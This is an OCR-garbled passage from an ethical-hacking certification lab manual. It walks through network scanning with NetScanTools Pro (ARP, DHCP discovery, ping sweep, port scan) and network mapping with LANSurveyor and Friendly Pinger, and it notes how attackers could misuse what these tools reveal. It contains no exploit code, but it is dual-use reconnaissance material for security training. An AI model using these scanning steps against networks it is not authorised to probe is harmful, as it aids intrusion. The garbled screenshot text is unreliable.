‫״‬re Oacovety T« orisroots P3c«1Leveltool: bcemai toots Pro0r3m Into | ( <x Help pres? FI FIGURE 7.5: Selecting manual tools option Select the Send Broadcast ARP, then Unicast ARP radio button, enter the IP address in Target IPv4 Address, and click Send Arp 9. — IP version 6addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6addresses always contain 2 or more colon characters and never contain periods. Example: 20 0 1 :4860:b006:69 (ip v 6. g o o g le . com) o r : : 1 ( in te r n a l loopback a d d re ss £7 Arp Ping is a useful tool capable of sending ARP packets to a target IP address and it can also search for multiple devices sharing the same IP address on your LAN Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 145
Module 03 - Scanning Networks s i- ! ‫״‬,test NetScanTools® Pro Demo Version Build 8 17 12 based on version 11.19 File Fdit Accessibility View IPv6 Help ‫ג‬ * ‫ו‬® To Aatom*ted | Report? Q Addto Psvorftac Send &0‫־‬acc35T ARP, then in tost ARP D upi:a;es S-‫־‬c ‫מ‬ (f:00.00 Ol^FAa* E O sendB-oaCcae:arp cnly OSe*th for Dipicate IPAddesoss U9eARPPadtetsto Pnc an [Pv«adjfc55onyar subnet. Target IPva Aadett index ip Address mac Address Response Tine (aseci Type 0 10.0.0.1 - •• • * ♦ - cc 0.002649 Broadcast 1 < * ♦‫־‬10.0.0.1 cc :.o ::» to U nicast 2 10.0.0.1 - - ■+ ce 0.003318 OnIcaat 3 10.0.0.1 cc 0.002318 U nicast 4 10.0.0.1 • cc 0.0:69*3 ur.ic a a t 5 10.0.0.1 - •• — ♦ cc 0.007615 Cr.le a s t f 1 0 .0 .0 .1 cc O.OC25IC Cr.Icaat ‫ל‬ 10.0.0.1 - *• • * <» cc 0.00198C (Inic a a t 8 • • » • ‫־‬ • ♦ ‫־‬ '1 0 .0 .0 .1 cc o.ooiess Onicaat 3 1 0 .0 .0 .1 - • • • « » ♦ cc 0.0:2318 Ur.icaat 10 1 0 .0 .0 .1 cc 0.0:26*9 Ur.icaat 11 10.0.0.1 - a. ■* <» - cc 0.0:2649 tin ic a a t 12 10.0.0.1 - ♦ cc 0.002318 (Tnic a a t 13 • • • • • • » « ♦ ‫״‬10.0.0.1 cc 0.002318 Unieaat 14 10.0.0.1 • cc :.0 :2 6 4 9 Vnicaat 15 1 0 .0 .0 .1 Cr.ic a a t iendArc Stop N jr b n to Send cvcteTne (ms) I“00 EJ WnPcapI‫״‬Tcrfe<TP Automated Tools ►.Unual Tools lalf) U ARPPing u ■an |MA£ u A flP?c«n|M A Ci<‫״‬ n) Cache Forensic! Co‫״‬ n«t»on Monitor |v | Fawonte Tooli Aa!re DHtovery Tool! Pj11 !x< Oiiovcry Tooli O t« Tools P a « « level rools trtem ji looit f*‫־‬coram Into FPuiger 7.6: Result of ARP Ping 10. Click ARP Scan (MAC Scan) in the left panel. A window will appear with information about the ARP scan tool. Click OK Q Send Broadcast ARP, and then Unicast ARP - this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box 1al Tools • ARP Pti•y J •‫־‬p o ad c a a t ic a a t le a s t le a s t lea se i c a s t ic a a t l e a s t l e a s t icaat !ea st !e a s t le a s t ic a a t test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 File Fdit Accessibility View IPv6 Help About the A R P Scan Tool • Use Uib tool lo send an ARP RoqiM&t to evury IPv4 addrtsA on your LAN. IPv4 connected devices cswtrtArtsfrom ARP .K u n and mu»t rupond with th«f IP •nd MAC *d fir•*•. • Uncheck we ResoKre f>5 box for fssrti scan co‫׳‬rpi«on ome. • Don't Cornet to 1io : d tk n the 1e>ute for a menu with moio options. mo Lim itations. Hone. Automated Toot y ARPStan 1mac sea Ca<n« ForcnsKs Attn* Uncovery 10 relivel>K0v»ryl« Tool ‫ש‬ ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4 connected devices. FIGURE 7.7: Selecting ARP Scan (MAC Scan) option 11. Enter the range o f IPv4 address in Starting IPv4 Address and Ending IPv4 Address text boxes 12. Click Do Arp Scan Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 146
Module 03 - Scanning Networks ‫־‬ar The Connection Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database. 13. Click DHCP Server Discovery in the left panel, a window will appear with information about DHCP Server Discovery Tool. Click OK f*: test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 ! ‫־‬ n ' * f4e Ed* Accessibility View IPv6 H e# LJ DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP serv. FIGURE 7.9: Selecting DHCP Server Discovery Tool Option 14. Select all the Discover Options check box and click Discover DHCP Servers RPSean tMAC Son, c ry Type lo c a l naxle 10.0.0 n a x ic 1 0 .0 .0 About Hit* DHCP Sorv1*f Discovery Tool • U se U ib 1004 t o j it n n iy t o u t e DHCP aanrors ( IP v1 o n ly ) o n you r local n e tw o r k . It ifto m th« P addrau and k « : ‫־‬g» * » b«ng landed out by DHCP Ih it too! a n a to find unknown or rooue' DHCP *rv erj. • D o n 't Io tg e t to right d c k n th« results for a menu with more options. Dano limitations. • N one. *u»0*n8ted lool Manual 10011 tall Catha Forrniict ♦ Connection Monitc O K P S fw r Oucorc a>T00IS - ‫י‬ J DNS Tools-core P n tn r Ditcaveiy Tc P « l r l level Tool External Too 11 ‫י‬‫־־‬“‫היו‬‫־‬test NetScanTools* Pro Demo Version Build 8-17 12based0nvefs»0n !1.19 File Edil Accembility View IPv6 Help Manual Too 4 - ARP Scan (MAC Stan) $ Adsnocc [ J j‫׳‬p 0 ‫־‬ A 1 2 ra a l I]Addts^avaKat Staroic F v4 Acerea‫־‬ | :0. 0 &v4ngIPv4Adjress Entry Type l>5c•! dyr.arie 10 . 0.0 dynaxac 1 0 .0 .0 ip v i M . . . w e Adflreofl r / r M 4 n u r*c f3 re r B cttaM C 1 0 .0 .0 .1 0( ‫׳‬ « - . . . n e t;c a r , la c . 1 1 0 .0 .0 .2 EC . &»11 la c vm-MSSCL. ‫פב‬ U9e thE tod a fine al active IPv4 d riers o‫י׳‬ you! n im -t. iVnPcwInterfaxS' I 10.0.0.7 Scon OSsy Tnc {•>») (IZZ₪ 0 Resolve Ps ii/to n a te d Toots Manual Tools lalf) ARP Ping can (MAC u A«P*can(MAC5<an) Cache forensic( Connection Monitor FawxKe Tools Active Discovery Tool! P^iiixe Discovery Too11 otis roois PSCttt LCV(I Tools exttmai toon »0‫־י‬gram into FIGURE 7.8 Result of ARP Scan (MAC Scan) Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 147
Module 03 - Scanning Networks Q NetScanner, this is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations FIGURE 7.10: Result of DHCP Server Drscovery 15. Click Ping scanner in the left panel. A window will appear with information about Ping Scanner tool. Click OK £0 Port Scanner is a tool designed to determine which ports on a target computer are active Le. being used by services or daemons. 16. Select the Use Default System DNS radio button, and enter the range of IP address in Start IP and End IP boxes 17. Click Start NttSunTooii* P!o S? test NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 A b ou t the Ping Scanner (a ka N etScann er) lo o l • use rim r o d ro pm g a ranoe o r lm o f IPv4 addresses. this tool shows you ch compuw‫׳‬ s are acOve w tJiir! ? 0 * 106, h t(:re » hav« to rapond to ping). Uso it *vith an* u t o f F a d flf«s «. To **eafl ee*‫׳‬ c*s n your subrtrt indudmg trios*blocking ping, you can j m u m ARP So n tool. • You can ■nport a te x t lest o f IP v4 addresses to pmg. D o n 't mres th is s p w a l fe a tu re m th is to o k use the Do SMB/NBNS Scan to per NetBIOS r«oom «5 fiom unprotected W in d o ** corrput&s. • D o n 't fo rg e t td nght d!dc m the results for a menu with more opaons. D em o Im ita tio n s . • Packet Delay (tim e b etw een sending each pm g) is lim ited to a lo w e r tamt o f SO nulliseconds. P arker Delay can b e as lo w as zero (0 ) ms m th e f i l l version. In o th e r words, th e full version w i b e a b it faster. F8e EdK Atcesiiblfity Vltw IPv6 H«tp A j . j A I C WtKOIM AUtOIMt«J ToOh M jn g jl T00K (411 mRng ErvurKcJ mfir,g - Graphical a Port Scanner . JP’oam u o in M odf *><« ravontctoon ‫׳‬0!MintDticovery 10Discovery DNS10011 P x te t L trti tooii Tools °rooram inro FIGURE 7.11: selecting Ping scanner Option I V test - NetScanTools* Pro Demo Version Build 8-17-12 based or version 11.19 Fnri DHCPServers an f a r Add Itoie For Hdo. p‫-׳‬e£8 F: IM A *rtonoted Ode or mtrrfacc bdow then crcos Discover QAddtoP®»flnre5 T M A ddress KIC Addreas I n t« r f « r • D e sc rip tio n 1 0 .0 .0 .7 L . A A «» I I iD H yper-V V i r t a • ! E th e rn e t A dapter #2 Rsxordnc DHCP Servers Discover ( X P Server* Stop W at Time (sec) EHCr S e r v e r I P S e r v e r Hd3 LnoM O f f e r e d I ? O f f e r e d S u b n e t Mask IP A d d re s s I 1 0 .0 .0 .1 1 0 .0 .0 .1 1 0 . 0 . 0 . 2 ‫י‬ SS. 2SS. 2SS. 0 3 d ays, 0 :0 ( DiscouB0 ‫?־‬H3n t ‫י‬ ‫׳‬ H05tn3r 1e V Subnet M5*r V‫׳‬ D onor ftairc ‫׳י‬ d n s p ‫׳י‬ Router P fa*KTP Servers Aurcmated To015 Cache Forenjio B.:nnccton Monitor DHCP S«1 1 »‫׳‬ Discovery aTook - ! a DIIS Took - Coie DMSloo's ■Advanced FiwoiiU Tools A<tfc« Dii coveiy Tools Paislv* Discovery Tools DNS Too11 C rrtl Tooli W * ‫*וזז‬ Tools Pioqrtm Inro Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 148
Module 03 - Scanning Networks test - NetScanTools* Pro Demo Version Build 8-17-12 based or version 11.19 ----- « e 6dK Accessibility View IPv6 Start iP 10.0.0.: ‫י‬‫׳‬ ‫ח‬ ‫ח‬ |‫•׳‬ ' Lke Defadt System DN5j EndJP 10.0.0.S0 - IH O Use Specific DNS: v l l * AKANrtSeannw □ *5<J r0f®«0n?r3 Time ( M | StA toa 0:0 te a : s c p iv 0:0 tchs toply 0:0 Echs taply 0:0 Echs Reply T a rg e t IP Hostname 10.0.0.1 ? 0 10.5.0.2 tnK‫־‬KS3ELOUK41 0 10.0.0.5 my:-UQM3MRiR«M 0 1 0 .0 .0 .7 WIN-D39HRSHL9E4 0 Fa Hdp, press F1 0 ResolveTPs MSttp.0/.255Wl Addtbnal ScanTests: 1 103 I oca ARPSeen □ 0 3 S*‫׳‬E.fc8S Scar □ Do Sulnel M ai: Sea‫!־‬ EnaSfc Post-Scan M O b lg of Msn-decso'dns Ps | irw:»vu«: I Oeof Imported tm Aurc mated To015 © Port Scanner mPro»ucu ou5 M ode S<onr ^ FaroiK• Tools Attfci* Oil cover?Tools Pais** Discovery Tools DNS Too11 S* ‫׳‬J «I L*vtl ToolI M * 1nal Tools Pfogr•!* Info CQ Traceioute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream internet provider(s) that service a network connected device. FIGURE 7.12: Result of sail IP address 18. Click Port scanner in the left panel. A window will appear with information about die port scanner tool. Click OK - _ l n l x ‫ך‬ unnti/NetSunnei 9 test NetScanTool‘ $ Pro Demo Version Build 8-17-12 based on version 11.19F About the Port Scanner 1ool NEVERSCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER’S PERMISSION TO SCAN. • use rtm ‫ז‬ool to scan 1target for icp or ‫*וגווו‬ ports that .‫ר‬‫מו‬ listening (open with senna* fcstening). • ly p e s o f sc a n n in g su p p o rted : ‫״‬ull C onnect TCP Scan (see notes below }. U0P port u 'reoch asle scan, combined TCP ful c o r r e c t and UOP scan, TCP SYN only scan and t c p OT^er s o n . • D o n 't m iss th is sp ec ia l le d tu r e in t h 's to o l: After a target has been scanned, an a‫״‬ alfs s .vineow will open in >our Oeh J t w eb browser. • D o n 't fo r g e t ‫מז‬ n gh t c*<k n w e resjits for 3 menu with m ore options. Notes: settings that strongly affect scan speed: • Come::ton Timeout use 200 c* less on a fast network correction yjdhneaiby cor‫״‬p .te i. _ * 3 ) 3003 ‫־‬ seconds) or more on ad a u : conneoo‫־׳‬ • W ot After Connect - J is c- ►‫י‬0‫י‬ «long each port test waits before deoting thot ih ; port is ,‫־‬o r a o e . • setfln<cA>ebvsettee* ccmccxns. Try0, (hen(ry lire. Noticethedfferexe. • SfetU1» ° ‫־‬ M G m e c jir * Domo KmlUtlons. • Hone. F ie Ed11 Accembilrty View IPv6 Help rii h 3■‫>ב‬I^ WeKom* Automated T0011 M«nu«ITouU Iall PW0 tnnanced P nq Scanner Port Scanner uP01»K U 0ut Mode ‘ FIGURE 7.13: selectingPort scanner option 19. Enter the IP Address in the Target Hostname or IP Address field and select the TCP Ports only radio button 20. Click Scan Range of Ports Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 149
Module 03 - Scanning Networks ‫׳‬‫״‬‫־‬1-1°test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 fte Ed* Accessibility View 6‫י)ו‬ Help Manual Fools - Port Scanner ^ I • ■ ' T C P P o r t s I PoreRange are! Sarvfcafc LDP P3te Cny AripTO *utOHMted | O TCP4UJPPorts ( I Otcpsyn OlCPaMM □^to^ont• Start 1 B'd f a T3r0ut HKTSire 3r P A:d‫£־‬S3 I10.0-01 I WARNING: the- tod scan? r * rargrfr- ports. Scan C irp lrtr. Show Al Sanr«d Ports, Actlvi 0‫ז‬Not P o rt P o rt D vac P ro to co l R e su lt■ O at• R» » .v » d 80 h te p TCP P o rt A c tiv e R.anoc of ! v s‫״‬Sea St* ‫י‬ Comnon Path | &dtco n w > Parts Let :‫־‬MrPasp:-ir-^acr 10.D.0. Connect Trcout ( 100D= !second] : w a t Aftc‫׳‬ co‫>¥־‬co ( I COD - 1**tontf : FIGURE 7.14: Result of Port scanner Automated Tool? Manual Toots (alij m Port Stunner JPro«ncuou5 Mode 1 f3vor1t* Tools /»<t*‫«׳‬ Discoreiy Tools Passr/t Discovery tools DNS roois p « * « t tm l loon txttm ji Tools Program inro Lab Analysis Document all die IP addresses, open and closed ports, services, and protocols you discovered during die lab. Tool/U tility Inform ation C ollected/O bjectives Achieved ARP Scan Results: ■ IPv4 Address ■ MAC Address ■ I/F Manufacturer ■ Hostname ■ Entry Type ■ Local Address N etScan Tools p ro Inform ation for Discovered D H C P Servers: ■ IPv4 Address: 10.0.0.7 ■ Interface Description: Hyper-V Virtual Ethernet Adapter #2 ■ D H C P Server IP: 10.0.0.1 ■ Server H ostnam e: 10.0.0.1 ■ Offered IP: 10.0.0.7 ■ Offered Subnet Mask: 255.255.255.0 Ethical H acking and Counterm easures Copyright O by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 150
Module 03 - Scanning Networks Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Does NetScaii Tools Pro support proxy servers or firewalls? Internet Connection Required 0 Noes□ Y Platform Supported 0 iLabs0 Classroom Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 151
Module 03 - Scanning Networks Drawing Network Diagrams Using LANSurveyor l^42s/nvejor discoversa nehvork andproduces a comprehensivenehvork diagram thatintegrates OSI Layer2 andLajer3 topologydata. Lab Scenario Ail attacker can gather information fiom ARP Scan, DHCP Servers, etc. using NetScan Tools Pro, as you have learned in die previous lab. Using diis information an attacker can compromise a DHCP server 011 the network; they might disrupt network services, preventing DHCP clients from connecting to network resources. By gaining control of a DHCP server, attackers can configure DHCP clients with fraudulent TCP/IP configuration information, including an invalid default gateway or DNS server configuration. 111 diis lab, you will learn to draw network diagrams using LANSurveyor. To be an expert network administrator and penetration te ster you need to discover network topology and produce comprehensive network diagrams for discovered networks. Lab O bjectives The objective of diis lab is to help students discover and diagram network topology and map a discovered network. 111 diis lab, you need to: ■ Draw’a map showing die logical connectivity of your network and navigate around die map ■ Create a report diat includes all you! managed switches and hubs ICON KEY 2 7 Valuable information Test your knowledge ‫ס‬ W eb exercise m W orkbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 152
Module 03 - Scanning Networks Lab Environm ent To perform die lab, you need: ■ LANSurveyor located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksNetwork Discovery and Mapping ToolsLANsurveyor ■ You can also download the latest version of LANSurveyor from die link http: / / www.solarwi11ds.com/ ■ If you decide to download die latest version, dien screenshots shown in die lab might differ ■ A computer miming Windows Server 2012 ■ A web browser widi Internet access ■ Administrative privileges to mil die LANSurveyor tool Lab Duration Time: 10 Minutes O verview of LANSurveyor SolarWinds LANsurveyor automatically discovers your network and produces a comprehensive network diagram that can be easily exported to Microsoft Office Visio. LANsurveyor automatically detects new devices and changes to network topology. It simplifies inventory management for hardware and software assets, addresses reporting needs for PCI compliance and other regulatory requirements. Lab Tasks Install LANSurveyor on your Windows Server 2012 Follow die wizard-driven installation steps and install LANSurvyor. 1. Launch the Start menu by hovering die mouse cursor in the lower-left corner of the desktop ZZy Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks TASK 1 Draw Network Diagram 4 WindowsServer2012 « m m to w JOii «*<*•* C«:*d1tr 0«jce‫■׳«׳‬ (vafcrtun copy. lull) •40: FIGURE 8.1:Windows Server2012- Desktop view 2. Click the LANSurvyor app to open the LANSurvyor window C E H Lab M anual Page 153 Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks Start A d m in is t r a t o r £ Serw Windows G o o * H »p«V lANswv.. Moraler PowetShd Chrwne 1-'Xvj j. b m o * ■ Pamrt Q w V e £ 2 ? w : a rwn«t hptom ‫״‬ ‫ף‬ l i Megafing N ee an L . Pto Demo FIGURE 8.2 WindowsServer 2012- Apps 3. Review the limitations of the evaluation software and then click Continue with Evaluation to continue the evaluation ‫יי‬*‫י‬‫ם‬‫י‬-‫ן‬SolarWinds LANsurveyor [fie Edit Menage Mcnitoi Report Tods Window Help s o la rw in d s FIGURE 8.3: LANSurveyor evaluationwindow 4. The Getting Started with LANsurveyor dialog box is displayed. Click Start Scanning Network Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited LANsurveyor's Responder client Manage remote Windows, Linus, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files ^ LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.) C E H Lab M anual Page 154
Module 03 - Scanning Networks r Getting Started with LANsurveyor ■ a u so la rw in ds7' V/atch a vd ae n t'o to barn more What you can do with LANsurveyor. Scan and map Layer 1. 2. 3 network topology &] Export maps to Microsoft V tito » View example mgp "2 Continuously scan your network automatically Onca aavod, a I cuatom ‫׳‬nap■a ca r be u otd m SelarV/nda n o t/.o ‫׳‬k and opplcator managerrcnt software, le arn more » » thwack LANsurveyor forum th w a c k is 8 community site o ro vidiro S o b r t V rd s j s e ‫־‬s w ith u sefu l niom ato n. to o s and v a u a b le re so jrc e s » Qnfcne Manual For additional hep on using the LAIJsu‫־‬veyor read the LANSurveyor Administrator Gude » Evaluation Guide T ha L A M au rvayor Evaiuabon Guida p rc v d a a an irtr» d1»cton to L A M au rvayor faaturaa a r d ra tn ic b c n a fe r n tta lin j. c o n fg u r n j, and jsm g L AH surveyor. » Support T h e S o h rw in d s S upoorl W e b * i» o ffe r* a s e n p re h e rs v e set o f tool* to help y o u n a n a o e a ‫׳‬uJ n a rta m y o » r S oh rW ind * appleations v b t tne <ii^yd£a1 £ .ea2s, f i c ^ t y Q vy»t9»». or Jp o a ic ] [Start S c a n rirg fJet.‫.׳‬ o ‫־‬k I IDon't show agah FIGURE 8.4: Getting Started with LANSurveyor Wizard 5. The Create A Network Map window will appears; in order to draw a network diagram enter the IP address in Begin Address and End Address, and click Start Network Discovery fi LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information. Ethical H acking and Counterm easures Copyright O by EC-Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 155
‫־‬ ‫מ‬Create A New Network Map Module 03 - Scanning Networks Netuioik Paraneetr H op s EecinAcdies; Erd Address 10.00.1 10.D.0.254 Enter Ke>tAddressHere (Folowtrg cuter hopj requires SNMPfouleraccess! Rotfers. Switches and□her SNMPDe/ice Dijcovery ■-M* 0 SNMPvl D*vk#j ••SMMP/I CommunityStrng(*) =‫=&־‬ [ p tfe fc private QSHWPv2cDevices•• SNMPv2cCommunityStrngfs) | pubiu. pmats QSNNPv3Devices I SNMPv3Options.. Other IPServiceDixovery Ivi LANsuveya Fejpcnder; LANsurvefo*Responder Password:1jP I IActve Directory DCs SlCMPprg) 0Nel8ICS Ciwvs MSPCSer* Mapping Speed FasterSlower 0 Configuration Ma^aperon* IDiscovery Donf^uiaiijn..Save0ixovery Confgwaiion. StartNotv»o*kDioco/cry| Cored FIGURE 8.5: New Network Map window 6. The entered IP address mapping process will display as shown in the following figure Mapping Progress Searching for P nodes HopO: 10.0.0.1 - 10.0.0.254 Last Node Contacted: WIN-D39MR5HL9E4 SNMP Sends SNMP Recess: ICMP Ping Sends: ICMP Receipts Subnets Mapped Nodes Mapped Routers Mapped Switches Mapped Cancel FIGURE 8.6:Mapping progress window 7. LANsurveyor displays die map of your network — LANsurveyor's network discovery discovers aU network nodes, regardless ofwhether they are end nodes, routers, switches or any other node with an IP address 03 LANsurveyor rs capable of discovering and mappmg multiple VLANs on Layer 2. For example, to map a switch connecting multiple, non- consecutive VLANs Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 156
Module 03 - Scanning Networks SclaAVinds LANsurveyor - [Map 1] | ^ = X ■ M e Edit Manage Monitor Report Tools A v d o w Help ‫■־‬1-1- ‫נ‬ & h 00 j 1* 151 v s 3 a 0 a s r&© ♦ ‫׳‬ | solarwinds •‫׳‬ KH‘>e ©. id *T |100*; v & m o ‫־־‬ 111 Overview f*~| veisor W1N-DWlllR»lLSt4 WIN D3JI H5HJ *« W ti '.'SilLCM W I Wf.-WSC'tlXMK-O ‫׳‬non•' 1 00 9 1 0.0.255(.•-0.0‫.נ‬‫נ‬.­ - ■ ‫״‬V*4UCONJWRSfWW MN-LXQN3WRJNSN 10006 12- Network Segments (1} P Addresses (4) Domain Names (4) Node Names (4) fP R euter LANjurveyor Responder Nodes SNMP Nodes SNMP Svntches H ubs SIP (V0IPJ Nodes layer J Nodes Actrve Directory DCs Groups E tf=d ff£ - 4 M ffc- hC as * ft FIGURE 8.7: Resulted network diagram Lab Analysis Document all die IP addresses, domain names, node names, IP routers, and SNMP nodes you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Acliieved LANSurveyor IP address: 10.0.0.1 -10.0.0.254 IP N odes Details: ■ SNMP Send - 62 ■ ICMP Ping Send 31‫־‬ ■ ICMP Receipts 4 ‫־‬ ■ Nodes Mapped 4 ‫־‬ N etw ork segm ent Details: ■ IP Address - 4 ■ Domain Names - 4 ■ Node Names - 4 Q LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers. Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 157
Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Module 03 - Scanning Networks Questions 1. Does LANSurveyor map every IP address to its corresponding switch or hub port? 2. Can examine nodes connected via wireless access points be detected and mapped? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 15S
Module 03 - Scanning Networks Mapping a Network Using Friendly Pinger Friendly Pingeris a user-friendlyapplicationfor network administration, monitoring, andinventory Lab Scenario 111die previous lab, you found die SNAIP, ICMP Ping, Nodes Mapped, etc. details using die tool LANSurveyor. If an attacker is able to get ahold of this information, he or she can shut down your network using SNMP. They can also get a list of interfaces 011 a router using die default name public and disable diem using die read- write community. SNMP MIBs include information about the identity of the agent's host and attacker can take advantage of diis information to initiate an attack. Using die ICMP reconnaissance technique an attacker can also determine die topology of die target network. Attackers could use either die ICMP ,’Time exceeded" or "Destination unreachable" messages. Bodi of diese ICMP messages can cause a host to immediately drop a connection. As an expert Network Administrator and Penetration Tester you need to discover network topology and produce comprehensive network diagrams for discovered networks and block attacks by deploying firewalls 011 a network to filter un-wanted traffic. You should be able to block outgoing SNMP traffic at border routers or firewalls. 111diis lab, you will leani to map a network using die tool Friendly Pinger. Lab O bjectives The objective of diis lab is to help students discover and diagram network topology and map a discovered network. h i diis lab, you need to: ■ Discover a network using discovery techniques ■ Diagram the network topology ■ Detect new devices and modifications made in network topology ■ Perform inventory management for hardware and software assets ICON KEY 2 7 Valuable information Test your knowledge ‫ס‬ W eb exercise m W orkbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 159
Module 03 - Scanning Networks Lab Environm ent To perform die lab, you need: ■ Friendly Pinger located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksNetwork Discovery and Mapping ToolsFriendlyPinger ■ You can also download the latest version of Friendly Pinger from the link http :// www.kilievich.com/fpinge17dovnload.htm ■ If you decide to download the latest version, dien screenshots shown in die lab might differ ■ A computer running Windows Server 2012 ■ A web browser widi Internet access ■ Administrative privileges to run die Friendly Pinger tool Lab Duration Time: 10 Minutes O verview of N etw ork Mapping Network mapping is die study of die physical connectivity of networks. Network mapping is often carried out to discover servers and operating systems ruining on networks. This tecluiique detects new devices and modifications made in network topology You can perform inventory management for hardware and software assets. Friendly Pinger performs the following to map the network: ■ Monitoring network devices availability ■ Notifies if any server wakes or goes down ■ Ping of all devices in parallel at once ■ Audits hardware and software components installed on the computers over the network Lab Tasks 1. Install Friendly Pinger 0x1 your Windows Server 2012 2. Follow die wizard-driven installation steps and install Friendly Pinger. 3. Launch the Start menu by hovering die mouse cursor in die lower-left corner of the desktop ZZ7 Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks t a s k 1 Draw Network Map Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 160
Module 03 - Scanning Networks FIGURE 9.1: Windows Server2012- Desktop view 4. Click the Friendly Pinger app to open the Friendly Pinger window Start Administrator ^ Sen*r Manager Windows PowerSMI GOOQte Chrome Uninaall r_ m * % & Com piler Control Panol V H y p «-V Machine.. 9 ¥ £ Eaplewr Command Prompt !‫ר״‬ M02111a Firefbx €> Path Ana»/zer Pro 2.7 i l ■ K m SmnfcOL. Fnendty PW^ff O rtef o fl* IG FIGURE 9.2 Windows Server 2012- Apps 5. The Friendly Pinger window appears, and Friendly Pinger prompts you to watch an online demonstration. 6. Click No Friendly Pinger [Demo.mapl H ‫ם‬ 1 fife E dit V ie w P in q N o tific a tio n S can F W a tc h c r Inven tory H elp 1‫צ‬ □ &£ - y a fit ‫־‬ * V D oto * ‫׳‬ - Demonstration map In la n d M.ui Sh u ll cut S m v ti s - WoikStation WndcStation (*mall) ^ 21/24/37 & OG00:35dick the client orco to add ‫ג‬ new derice... FIGURE 9.3: FPinger Main Window Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited ^ You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods. Friendly Pinger will display IP-address ofyour computer and will offer an exemplary range of IP- addresses for scanning & To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute". In the lower part of the map a TraceRoute dialog window will appear. In the process of determination of the intermediate addresses, they will be displayed as a list in this window and a route will be displayed as red arrows on the map C E H Lab M anual Page 161
